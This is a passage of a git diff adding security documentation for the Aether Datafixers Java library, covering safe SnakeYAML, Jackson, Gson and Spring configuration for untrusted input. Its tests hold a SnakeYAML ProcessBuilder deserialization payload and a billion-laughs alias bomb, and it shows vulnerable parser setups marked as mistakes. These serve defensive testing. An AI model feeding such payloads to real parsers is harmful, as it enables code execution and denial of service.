`allowRecursiveKeys` | false | false | Prevent recursive anchors | +| `wrappedToRootException` | false | true | Better error handling | + +--- + +## Integration with Aether Datafixers + +### Secure Migration Service + +```java +public class SecureYamlMigrationService { + + private final AetherDataFixer fixer; + private final Yaml yaml; + + public SecureYamlMigrationService(AetherDataFixer fixer) { + this.fixer = fixer; + + LoaderOptions options = new LoaderOptions(); + options.setMaxAliasesForCollections(50); + options.setNestingDepthLimit(50); + options.setCodePointLimit(3 * 1024 * 1024); + options.setAllowDuplicateKeys(false); + + this.yaml = new Yaml(new SafeConstructor(options)); + } + + public TaggedDynamic migrate( + String untrustedYaml, + TypeReference type, + DataVersion from, + DataVersion to) { + + // Parse with safe settings + Object data = yaml.load(untrustedYaml); + Dynamic dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data); + + // Migrate + TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic); + return fixer.update(tagged, from, to); + } +} +``` + +### Pre-Validation + +For additional security, validate input before parsing: + +```java +public class YamlValidator { + + private static final long MAX_SIZE = 1024 * 1024; // 1MB + + public void validateBeforeParsing(byte[] input) { + if (input.length > MAX_SIZE) { + throw new SecurityException("YAML input exceeds maximum size"); + } + } + + public void validateBeforeParsing(String input) { + if (input.length() > MAX_SIZE) { + throw new SecurityException("YAML input exceeds maximum size"); + } + } +} +``` + +--- + +## Testing Your Configuration + +Verify your configuration rejects malicious payloads: + +```java +@Test +void rejectsArbitraryClassInstantiation() { + String maliciousYaml = "!!java.lang.ProcessBuilder [[\"calc.exe\"]]"; + + Yaml safeYaml = new Yaml(new SafeConstructor(new LoaderOptions())); + + assertThrows(YAMLException.class, () -> safeYaml.load(maliciousYaml)); +} + +@Test +void rejectsBillionLaughs() { + String billionLaughs = """ + a: &a ["lol"] + b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a,*a] + c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b,*b] + d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c,*c] + e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d,*d] + f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e,*e] + """; + + LoaderOptions options = new LoaderOptions(); + options.setMaxAliasesForCollections(50); + Yaml safeYaml = new Yaml(new SafeConstructor(options)); + + assertThrows(YAMLException.class, () -> safeYaml.load(billionLaughs)); +} +``` + +--- + +## Common Mistakes + +### Mistake 1: Using Default Constructor + +```java +// WRONG - Vulnerable to RCE +Yaml yaml = new Yaml(); +Object data = yaml.load(userInput); +``` + +### Mistake 2: Using Custom Constructor Without SafeConstructor + +```java +// WRONG - Custom constructor may still be vulnerable +class MyConstructor extends Constructor { + // ... +} +Yaml yaml = new Yaml(new MyConstructor()); +``` + +### Mistake 3: Forgetting LoaderOptions + +```java +// WRONG - No limits on aliases or depth +Yaml yaml = new Yaml(new SafeConstructor()); // Uses default LoaderOptions +``` + +**Correct:** +```java +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); +options.setNestingDepthLimit(50); +Yaml yaml = new Yaml(new SafeConstructor(options)); +``` + +--- + +## Related + +- [Threat Model](../threat-model.md) +- [Best Practices](../best-practices.md) +- [YAML Support](../../codec/yaml.md) +- [Secure Configuration Examples](../secure-configuration-examples.md) diff --git a/docs/security/index.md b/docs/security/index.md new file mode 100644 index 0000000..ddb17df --- /dev/null +++ b/docs/security/index.md @@ -0,0 +1,118 @@ +# Security Overview + +This section provides guidance for securely handling untrusted data with Aether Datafixers. When processing data from external sources—user uploads, APIs, message queues, or file imports—proper security measures are essential to prevent attacks. + +## Quick Reference + +| Threat | Affected Formats | Risk | Mitigation | +|-----------------------------------|------------------|--------------|---------------------------| +| Arbitrary Code Execution | YAML (SnakeYAML) | **Critical** | Use `SafeConstructor` | +| Billion Laughs (Entity Expansion) | YAML, XML | High | Limit aliases/entities | +| XXE (External Entity Injection) | XML | High | Disable external entities | +| Polymorphic Deserialization | JSON (Jackson) | Medium | Avoid default typing | +| Resource Exhaustion | All | Medium | Size and depth limits | +| Stack Overflow | All | Medium | Nesting depth limits | + +## When to Apply Security Measures + +Apply the security recommendations in this documentation when: + +- **User Uploads** — Processing files uploaded by users (game saves, configs, data imports) +- **External APIs** — Consuming data from third-party APIs +- **Message Queues** — Processing messages from queues (Kafka, RabbitMQ, etc.) +- **Database Blobs** — Migrating serialized data stored in databases +- **File Imports** — Reading configuration or data files from untrusted sources + +## Documentation Structure + +### [Threat Model](threat-model.md) + +Understand the attack vectors and trust boundaries: +- Classification of untrusted data sources +- Detailed attack vector descriptions +- Impact assessment and risk analysis + +### [Format-Specific Security](format-considerations/index.md) + +Security considerations for each serialization format: +- [SnakeYAML Security](format-considerations/snakeyaml.md) — **Critical: RCE prevention** +- [Jackson Security](format-considerations/jackson.md) — XXE, polymorphic typing, depth limits +- [Gson Security](format-considerations/gson.md) — Safe defaults and validation + +### [Best Practices](best-practices.md) + +General security best practices: +- Input validation before migration +- Size and depth limits +- Timeout configuration +- Defense-in-depth checklist + +### [Secure Configuration Examples](secure-configuration-examples.md) + +Ready-to-use secure configurations: +- Safe `Yaml` setup for SnakeYAML +- Safe `ObjectMapper` setup for Jackson +- Safe `XmlMapper` setup for Jackson XML +- Complete migration service example + +### [Spring Security Integration](spring-security-integration.md) + +Integrating security with Spring Boot: +- Secure bean configuration +- Request validation filters +- Rate limiting +- Audit logging + +## Quick Start: Secure Configuration + +### SnakeYAML (Critical) + +```java +// ALWAYS use SafeConstructor for untrusted YAML +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); +options.setNestingDepthLimit(50); +options.setCodePointLimit(3 * 1024 * 1024); + +Yaml safeYaml = new Yaml(new SafeConstructor(options)); +Object data = safeYaml.load(untrustedInput); +Dynamic dynamic = new Dynamic<>(SnakeYamlOps.INSTANCE, data); +``` + +### Jackson JSON + +```java +StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); + +JsonFactory factory = JsonFactory.builder() + .streamReadConstraints(constraints) + .build(); + +ObjectMapper safeMapper = new ObjectMapper(factory); +JsonNode node = safeMapper.readTree(untrustedInput); +Dynamic dynamic = new Dynamic<>(JacksonJsonOps.INSTANCE, node); +``` + +### Jackson XML (XXE Prevention) + +```java +XMLInputFactory xmlFactory = XMLInputFactory.newFactory(); +xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); +xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); + +XmlMapper safeMapper = XmlMapper.builder( + XmlFactory.builder().xmlInputFactory(xmlFactory).build() +).build(); +JsonNode node = safeMapper.readTree(untrustedInput); +Dynamic dynamic = new Dynamic<>(JacksonXmlOps.INSTANCE, node); +``` + +## Related + +- [Codec Overview](../codec/index.md) +- [YAML Support](../codec/yaml.md) +- [XML Support](../codec/xml.md) +- [JSON Support](../codec/json.md) diff --git a/docs/security/secure-configuration-examples.md b/docs/security/secure-configuration-examples.md new file mode 100644 index 0000000..4d75c9d --- /dev/null +++ b/docs/security/secure-configuration-examples.md @@ -0,0 +1,513 @@ +# Secure Configuration Examples + +This document provides ready-to-use secure configurations for all supported formats. Copy and adapt these examples for your application. + +## Quick Reference + +| Format | Primary Risk | Required Configuration | +|--------------|---------------------------|-------------------------------------| +| SnakeYAML | RCE | `SafeConstructor` + `LoaderOptions` | +| Jackson JSON | Polymorphic typing, depth | `StreamReadConstraints` | +| Jackson XML | XXE | Disable external entities | +| Jackson YAML | Depth | `StreamReadConstraints` | +| Gson | Large payloads | Pre-validation | + +--- + +## SnakeYAML Secure Configuration + +### Basic Secure Setup + +```java +import org.yaml.snakeyaml.LoaderOptions; +import org.yaml.snakeyaml.Yaml; +import org.yaml.snakeyaml.constructor.SafeConstructor; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps; + +public class SecureSnakeYamlConfig { + + /** + * Creates a secure Yaml instance for parsing untrusted input. + */ + public static Yaml createSecureYaml() { + LoaderOptions options = new LoaderOptions(); + + // Prevent Billion Laughs (alias expansion attack) + options.setMaxAliasesForCollections(50); + + // Prevent stack overflow from deep nesting + options.setNestingDepthLimit(50); + + // Limit input size (3MB default) + options.setCodePointLimit(3 * 1024 * 1024); + + // Reject duplicate keys for data integrity + options.setAllowDuplicateKeys(false); + + // Use SafeConstructor to prevent arbitrary class instantiation + return new Yaml(new SafeConstructor(options)); + } + + /** + * Parses untrusted YAML securely and returns a Dynamic. + */ + public static Dynamic parseSecurely(String yaml) { + Yaml safeYaml = createSecureYaml(); + Object data = safeYaml.load(yaml); + return new Dynamic<>(SnakeYamlOps.INSTANCE, data); + } +} +``` + +### Usage Example + +```java +// Parse untrusted YAML +String untrustedYaml = request.getBody(); +Dynamic dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml); + +// Migrate +TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.PLAYER, dynamic); +TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion); +``` + +--- + +## Jackson JSON Secure Configuration + +### Basic Secure Setup + +```java +import com.fasterxml.jackson.core.JsonFactory; +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.ObjectMapper; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; + +public class SecureJacksonJsonConfig { + + /** + * Creates a secure ObjectMapper for parsing untrusted JSON. + */ + public static ObjectMapper createSecureMapper() { + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) // Prevent stack overflow + .maxNumberLength(100) // Limit number string length + .maxStringLength(1_000_000) // 1MB max string + .maxNameLength(1_000) // Limit field name length + .build(); + + JsonFactory factory = JsonFactory.builder() + .streamReadConstraints(constraints) + .build(); + + return new ObjectMapper(factory); + } + + /** + * Creates secure JacksonJsonOps instance. + */ + public static JacksonJsonOps createSecureOps() { + return new JacksonJsonOps(createSecureMapper()); + } + + /** + * Parses untrusted JSON securely and returns a Dynamic. + */ + public static Dynamic parseSecurely(String json) throws Exception { + ObjectMapper mapper = createSecureMapper(); + JsonNode node = mapper.readTree(json); + return new Dynamic<>(JacksonJsonOps.INSTANCE, node); + } + + /** + * Parses untrusted JSON securely with custom ops. + */ + public static Dynamic parseSecurely(byte[] json) throws Exception { + JacksonJsonOps ops = createSecureOps(); + JsonNode node = ops.mapper().readTree(json); + return new Dynamic<>(ops, node); + } +} +``` + +### Usage Example + +```java +// Parse untrusted JSON +byte[] untrustedJson = request.getBodyAsBytes(); +Dynamic dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson); + +// Migrate +TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.CONFIG, dynamic); +TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion); +``` + +--- + +## Jackson XML Secure Configuration (XXE Prevention) + +### Basic Secure Setup + +```java +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.dataformat.xml.XmlFactory; +import com.fasterxml.jackson.dataformat.xml.XmlMapper; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps; + +import javax.xml.stream.XMLInputFactory; + +public class SecureJacksonXmlConfig { + + /** + * Creates a secure XmlMapper with XXE prevention. + */ + public static XmlMapper createSecureMapper() { + // Configure secure XMLInputFactory + XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory(); + + // Disable external entities (XXE prevention) + xmlInputFactory.setProperty( + XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); + + // Disable DTD processing + xmlInputFactory.setProperty( + XMLInputFactory.SUPPORT_DTD, false); + + // Disable entity replacement + xmlInputFactory.setProperty( + XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false); + + // Configure read constraints + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); + + // Build secure factory + XmlFactory factory = XmlFactory.builder() + .xmlInputFactory(xmlInputFactory) + .streamReadConstraints(constraints) + .build(); + + return XmlMapper.builder(factory).build(); + } + + /** + * Creates secure JacksonXmlOps instance. + */ + public static JacksonXmlOps createSecureOps() { + return new JacksonXmlOps(createSecureMapper()); + } + + /** + * Parses untrusted XML securely and returns a Dynamic. + */ + public static Dynamic parseSecurely(String xml) throws Exception { + XmlMapper mapper = createSecureMapper(); + JsonNode node = mapper.readTree(xml); + return new Dynamic<>(new JacksonXmlOps(mapper), node); + } +} +``` + +### Usage Example + +```java +// Parse untrusted XML +String untrustedXml = request.getBody(); +Dynamic dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml); + +// Migrate +TaggedDynamic tagged = new TaggedDynamic<>(TypeReferences.SETTINGS, dynamic); +TaggedDynamic result = fixer.update(tagged, fromVersion, toVersion); +``` + +--- + +## Jackson YAML Secure Configuration + +### Basic Secure Setup + +```java +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.dataformat.yaml.YAMLFactory; +import com.fasterxml.jackson.dataformat.yaml.YAMLMapper; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps; + +public class SecureJacksonYamlConfig { + + /** + * Creates a secure YAMLMapper for parsing untrusted input. + */ + public static YAMLMapper createSecureMapper() { + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); + + YAMLFactory factory = YAMLFactory.builder() + .streamReadConstraints(constraints) + .build(); + + return new YAMLMapper(factory); + } + + /** + * Creates secure JacksonYamlOps instance. + */ + public static JacksonYamlOps createSecureOps() { + return new JacksonYamlOps(createSecureMapper()); + } + + /** + * Parses untrusted YAML securely and returns a Dynamic. + */ + public static Dynamic parseSecurely(String yaml) throws Exception { + YAMLMapper mapper = createSecureMapper(); + JsonNode node = mapper.readTree(yaml); + return new Dynamic<>(new JacksonYamlOps(mapper), node); + } +} +``` + +--- + +## Gson Secure Configuration + +### Basic Secure Setup with Validation + +```java +import com.google.gson.Gson; +import com.google.gson.GsonBuilder; +import com.google.gson.JsonElement; +import com.google.gson.JsonParser; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; + +public class SecureGsonConfig { + + private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB + private static final int MAX_DEPTH = 50; + + /** + * Creates a Gson instance (safe by default). + */ + public static Gson createGson() { + return new GsonBuilder() + .disableHtmlEscaping() + .create(); + } + + /** + * Parses untrusted JSON securely with size and depth validation. + */ + public static Dynamic parseSecurely(String json) { + // Validate size + if (json.length() > MAX_SIZE) { + throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE); + } + + // Parse + JsonElement element = JsonParser.parseString(json); + + // Validate depth + validateDepth(element, 0); + + return new Dynamic<>(GsonOps.INSTANCE, element); + } + + private static void validateDepth(JsonElement element, int depth) { + if (depth > MAX_DEPTH) { + throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH); + } + + if (element.isJsonObject()) { + element.getAsJsonObject().entrySet() + .forEach(e -> validateDepth(e.getValue(), depth + 1)); + } else if (element.isJsonArray()) { + element.getAsJsonArray() + .forEach(e -> validateDepth(e, depth + 1)); + } + } +} +``` + +--- + +## Complete Migration Service + +A complete service combining all security measures: + +```java +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.AetherDataFixer; +import de.splatgames.aether.datafixers.api.schema.DataVersion; +import de.splatgames.aether.datafixers.api.type.TaggedDynamic; +import de.splatgames.aether.datafixers.api.type.TypeReference; + +import java.util.concurrent.*; + +public class SecureMigrationService { + + private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; + private static final Duration TIMEOUT = Duration.ofSeconds(30); + + private final AetherDataFixer fixer; + private final ExecutorService executor; + + public SecureMigrationService(AetherDataFixer fixer) { + this.fixer = fixer; + this.executor = Executors.newCachedThreadPool(); + } + + /** + * Migrates untrusted JSON using Jackson. + */ + public TaggedDynamic migrateJson( + byte[] untrustedJson, + TypeReference type, + DataVersion from, + DataVersion to) throws Exception { + + validateSize(untrustedJson); + Dynamic dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson); + return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to); + } + + /** + * Migrates untrusted YAML using SnakeYAML. + */ + public TaggedDynamic migrateYaml( + String untrustedYaml, + TypeReference type, + DataVersion from, + DataVersion to) throws Exception { + + validateSize(untrustedYaml); + Dynamic dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml); + return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to); + } + + /** + * Migrates untrusted XML using Jackson. + */ + public TaggedDynamic migrateXml( + String untrustedXml, + TypeReference type, + DataVersion from, + DataVersion to) throws Exception { + + validateSize(untrustedXml); + Dynamic dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml); + return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to); + } + + private void validateSize(byte[] data) { + if (data.length > MAX_PAYLOAD_SIZE) { + throw new PayloadTooLargeException( + "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE); + } + } + + private void validateSize(String data) { + if (data.length() > MAX_PAYLOAD_SIZE) { + throw new PayloadTooLargeException( + "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE); + } + } + + private TaggedDynamic migrateWithTimeout( + TaggedDynamic input, + DataVersion from, + DataVersion to) throws Exception { + + Future> future = executor.submit( + () -> fixer.update(input, from, to) + ); + + try { + return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS); + } catch (TimeoutException e) { + future.cancel(true); + throw new MigrationTimeoutException("Migration timed out after " + TIMEOUT, e); + } catch (ExecutionException e) { + throw new MigrationException("Migration failed", e.getCause()); + } + } + + public void shutdown() { + executor.shutdown(); + } +} +``` + +### Usage + +```java +SecureMigrationService service = new SecureMigrationService(fixer); + +// Migrate JSON +TaggedDynamic result = service.migrateJson( + jsonBytes, + TypeReferences.PLAYER, + new DataVersion(100), + new DataVersion(200) +); + +// Migrate YAML +TaggedDynamic yamlResult = service.migrateYaml( + yamlString, + TypeReferences.CONFIG, + new DataVersion(1), + new DataVersion(5) +); + +// Migrate XML +TaggedDynamic xmlResult = service.migrateXml( + xmlString, + TypeReferences.SETTINGS, + new DataVersion(1), + new DataVersion(3) +); +``` + +--- + +## Exception Classes + +```java +public class PayloadTooLargeException extends SecurityException { + public PayloadTooLargeException(String message) { + super(message); + } +} + +public class MigrationTimeoutException extends RuntimeException { + public MigrationTimeoutException(String message, Throwable cause) { + super(message, cause); + } +} + +public class MigrationException extends RuntimeException { + public MigrationException(String message, Throwable cause) { + super(message, cause); + } +} +``` + +--- + +## Related + +- [Best Practices](best-practices.md) +- [SnakeYAML Security](format-considerations/snakeyaml.md) +- [Jackson Security](format-considerations/jackson.md) +- [Gson Security](format-considerations/gson.md) +- [Spring Security Integration](spring-security-integration.md) diff --git a/docs/security/spring-security-integration.md b/docs/security/spring-security-integration.md new file mode 100644 index 0000000..87087fe --- /dev/null +++ b/docs/security/spring-security-integration.md @@ -0,0 +1,649 @@ +# Spring Security Integration + +This guide covers integrating secure Aether Datafixers usage with Spring Boot and Spring Security. + +## Overview + +When using the `aether-datafixers-spring-boot-starter`, additional security measures should be implemented at the Spring level: + +1. **Secure Bean Configuration** — Configure secure parsers as Spring beans +2. **Request Validation** — Validate payloads before they reach migration endpoints +3. **Rate Limiting** — Prevent abuse of migration endpoints +4. **Audit Logging** — Track migration attempts for security monitoring + +--- + +## Secure Bean Configuration + +### Secure Parser Beans + +```java +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; +import org.yaml.snakeyaml.LoaderOptions; +import org.yaml.snakeyaml.Yaml; +import org.yaml.snakeyaml.constructor.SafeConstructor; +import com.fasterxml.jackson.databind.ObjectMapper; +import com.fasterxml.jackson.core.JsonFactory; +import com.fasterxml.jackson.core.StreamReadConstraints; +import com.fasterxml.jackson.dataformat.xml.XmlFactory; +import com.fasterxml.jackson.dataformat.xml.XmlMapper; +import javax.xml.stream.XMLInputFactory; + +@Configuration +public class SecureDataFixerConfig { + + @Bean + public Yaml secureYaml() { + LoaderOptions options = new LoaderOptions(); + options.setMaxAliasesForCollections(50); + options.setNestingDepthLimit(50); + options.setCodePointLimit(3 * 1024 * 1024); + options.setAllowDuplicateKeys(false); + return new Yaml(new SafeConstructor(options)); + } + + @Bean + public ObjectMapper secureJsonMapper() { + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxNumberLength(100) + .maxStringLength(1_000_000) + .build(); + + JsonFactory factory = JsonFactory.builder() + .streamReadConstraints(constraints) + .build(); + + return new ObjectMapper(factory); + } + + @Bean + public XmlMapper secureXmlMapper() { + XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory(); + xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); + xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); + + StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); + + XmlFactory factory = XmlFactory.builder() + .xmlInputFactory(xmlInputFactory) + .streamReadConstraints(constraints) + .build(); + + return XmlMapper.builder(factory).build(); + } +} +``` + +### Secure DynamicOps Beans + +```java +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; +import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps; + +@Configuration +public class SecureDynamicOpsConfig { + + @Bean + public JacksonJsonOps secureJsonOps(ObjectMapper secureJsonMapper) { + return new JacksonJsonOps(secureJsonMapper); + } + + @Bean + public JacksonXmlOps secureXmlOps(XmlMapper secureXmlMapper) { + return new JacksonXmlOps(secureXmlMapper); + } +} +``` + +--- + +## Request Validation Filter + +### Payload Size Validation + +```java +import jakarta.servlet.FilterChain; +import jakarta.servlet.ServletException; +import jakarta.servlet.http.HttpServletRequest; +import jakarta.servlet.http.HttpServletResponse; +import org.springframework.core.Ordered; +import org.springframework.core.annotation.Order; +import org.springframework.http.HttpStatus; +import org.springframework.stereotype.Component; +import org.springframework.web.filter.OncePerRequestFilter; + +@Component +@Order(Ordered.HIGHEST_PRECEDENCE) +public class PayloadSizeValidationFilter extends OncePerRequestFilter { + + private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB + + @Override + protected void doFilterInternal( + HttpServletRequest request, + HttpServletResponse response, + FilterChain chain) throws ServletException, IOException { + + // Check Content-Length header + long contentLength = request.getContentLengthLong(); + if (contentLength > MAX_PAYLOAD_SIZE) { + response.setStatus(HttpStatus.PAYLOAD_TOO_LARGE.value()); + response.getWriter().write("Payload exceeds maximum size"); + return; + } + + chain.doFilter(request, response); + } + + @Override + protected boolean shouldNotFilter(HttpServletRequest request) { + // Only filter migration endpoints + return !request.getRequestURI().startsWith("/api/migrate"); + } +} +``` + +### Content-Type Validation + +```java +import org.springframework.http.MediaType; + +@Component +@Order(Ordered.HIGHEST_PRECEDENCE + 1) +public class ContentTypeValidationFilter extends OncePerRequestFilter { + + private static final Set ALLOWED_CONTENT_TYPES = Set.of( + MediaType.APPLICATION_JSON_VALUE, + "application/yaml", + "text/yaml", + MediaType.APPLICATION_XML_VALUE, + MediaType.TEXT_XML_VALUE + ); + + @Override + protected void doFilterInternal( + HttpServletRequest request, + HttpServletResponse response, + FilterChain chain) throws ServletException, IOException { + + String contentType = request.getContentType(); + if (contentType != null) { + String baseType = contentType.split(";")[0].trim().toLowerCase(); + if (!ALLOWED_CONTENT_TYPES.contains(baseType)) { + response.setStatus(HttpStatus.UNSUPPORTED_MEDIA_TYPE.value()); + response.getWriter().write("Unsupported content type"); + return; + } + } + + chain.doFilter(request, response); + } + + @Override + protected boolean shouldNotFilter(HttpServletRequest request) { + return !request.getRequestURI().startsWith("/api/migrate") || + !"POST".equalsIgnoreCase(request.getMethod()); + } +} +``` + +--- + +## Rate Limiting + +### Using Resilience4j + +Add dependency: + +```xml + + io.github.resilience4j + resilience4j-spring-boot3 + 2.2.0 + +``` + +Configuration: + +```yaml +# application.yml +resilience4j: + ratelimiter: + instances: + migration: + limitForPeriod: 10 + limitRefreshPeriod: 1s + timeoutDuration: 0 +``` + +Controller: + +```java +import io.github.resilience4j.ratelimiter.annotation.RateLimiter; + +@RestController +@RequestMapping("/api/migrate") +public class MigrationController { + + private final MigrationService migrationService; + + public MigrationController(MigrationService migrationService) { + this.migrationService = migrationService; + } + + @PostMapping("/json") + @RateLimiter(name = "migration", fallbackMethod = "rateLimitFallback") + public ResponseEntity migrateJson( + @RequestBody byte[] data, + @RequestParam int fromVersion, + @RequestParam int toVersion, + @RequestParam String type) { + + MigrationResult result = migrationService + .migrate(data) + .from(fromVersion) + .to(toVersion) + .execute(); + + return ResponseEntity.ok(result); + } + + public ResponseEntity rateLimitFallback( + byte[] data, int fromVersion, int toVersion, String type, Throwable t) { + return ResponseEntity.status(HttpStatus.TOO_MANY_REQUESTS) + .body(MigrationResult.error("Rate limit exceeded. Please try again later.")); + } +} +``` + +### Using Bucket4j + +```java +import io.github.bucket4j.Bandwidth; +import io.github.bucket4j.Bucket; +import io.github.bucket4j.Refill; + +@Component +public class RateLimitingService { + + private final Map buckets = new ConcurrentHashMap<>(); + + public Bucket resolveBucket(String userId) { + return buckets.computeIfAbsent(userId, this::createBucket); + } + + private Bucket createBucket(String userId) { + Bandwidth limit = Bandwidth.classic(10, Refill.greedy(10, Duration.ofMinutes(1))); + return Bucket.builder().addLimit(limit).build(); + } + + public boolean tryConsume(String userId) { + return resolveBucket(userId).tryConsume(1); + } +} +``` + +--- + +## Audit Logging + +### Audit Aspect + +```java +import org.aspectj.lang.ProceedingJoinPoint; +import org.aspectj.lang.annotation.Around; +import org.aspectj.lang.annotation.Aspect; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.security.core.context.SecurityContextHolder; +import org.springframework.stereotype.Component; + +@Aspect +@Component +public class MigrationAuditAspect { + + private static final Logger AUDIT_LOG = LoggerFactory.getLogger("MIGRATION_AUDIT"); + + @Around("execution(* de.splatgames.aether.datafixers.spring.service.MigrationService.migrate(..))") + public Object auditMigration(ProceedingJoinPoint joinPoint) throws Throwable { + String user = getCurrentUser(); + long startTime = System.currentTimeMillis(); + + try { + Object result = joinPoint.proceed(); + long duration = System.currentTimeMillis() - startTime; + + AUDIT_LOG.info("MIGRATION_SUCCESS user={} duration={}ms", user, duration); + + return result; + } catch (Exception e) { + long duration = System.currentTimeMillis() - startTime; + + AUDIT_LOG.warn("MIGRATION_FAILURE user={} duration={}ms error={}", + user, duration, e.getMessage()); + + throw e; + } + } + + private String getCurrentUser() { + try { + return SecurityContextHolder.getContext() + .getAuthentication() + .getName(); + } catch (Exception e) { + return "anonymous"; + } + } +} +``` + +### Structured Logging with MDC + +```java +import org.slf4j.MDC; + +@Component +public class MigrationAuditAspect { + + private static final Logger LOG = LoggerFactory.getLogger(MigrationAuditAspect.class); + + @Around("execution(* MigrationService.migrate(..))") + public Object auditMigration(ProceedingJoinPoint joinPoint) throws Throwable { + String migrationId = UUID.randomUUID().toString(); + + MDC.put("migrationId", migrationId); + MDC.put("user", getCurrentUser()); + MDC.put("clientIp", getClientIp()); + + try { + Object result = joinPoint.proceed(); + LOG.info("Migration completed successfully"); + return result; + } catch (SecurityException e) { + LOG.warn("Migration blocked: {}", e.getMessage()); + throw e; + } catch (Exception e) { + LOG.error("Migration failed: {}", e.getMessage()); + throw e; + } finally { + MDC.clear(); + } + } +} +``` + +--- + +## Secure Migration Service + +### Complete Integration Example + +```java +import de.splatgames.aether.datafixers.spring.service.MigrationService; +import de.splatgames.aether.datafixers.spring.service.MigrationResult; +import org.springframework.stereotype.Service; +import org.yaml.snakeyaml.Yaml; + +@Service +public class SecureMigrationService { + + private static final long MAX_SIZE = 10 * 1024 * 1024; + + private final MigrationService migrationService; + private final Yaml secureYaml; + private final ObjectMapper secureJsonMapper; + private final XmlMapper secureXmlMapper; + + public SecureMigrationService( + MigrationService migrationService, + Yaml secureYaml, + ObjectMapper secureJsonMapper, + XmlMapper secureXmlMapper) { + this.migrationService = migrationService; + this.secureYaml = secureYaml; + this.secureJsonMapper = secureJsonMapper; + this.secureXmlMapper = secureXmlMapper; + } + + public MigrationResult migrateJsonSecurely( + byte[] input, + int fromVersion, + int toVersion) { + + validateSize(input); + + try { + JsonNode node = secureJsonMapper.readTree(input); + TaggedDynamic tagged = new TaggedDynamic<>( + TypeReferences.DATA, + new Dynamic<>(JacksonJsonOps.INSTANCE, node) + ); + + return migrationService + .migrate(tagged) + .from(fromVersion) + .to(toVersion) + .execute(); + } catch (Exception e) { + throw new MigrationException("JSON migration failed", e); + } + } + + public MigrationResult migrateYamlSecurely( + String input, + int fromVersion, + int toVersion) { + + validateSize(input); + + Object data = secureYaml.load(input); + TaggedDynamic tagged = new TaggedDynamic<>( + TypeReferences.DATA, + new Dynamic<>(SnakeYamlOps.INSTANCE, data) + ); + + return migrationService + .migrate(tagged) + .from(fromVersion) + .to(toVersion) + .execute(); + } + + public MigrationResult migrateXmlSecurely( + String input, + int fromVersion, + int toVersion) { + + validateSize(input); + + try { + JsonNode node = secureXmlMapper.readTree(input); + TaggedDynamic tagged = new TaggedDynamic<>( + TypeReferences.DATA, + new Dynamic<>(new JacksonXmlOps(secureXmlMapper), node) + ); + + return migrationService + 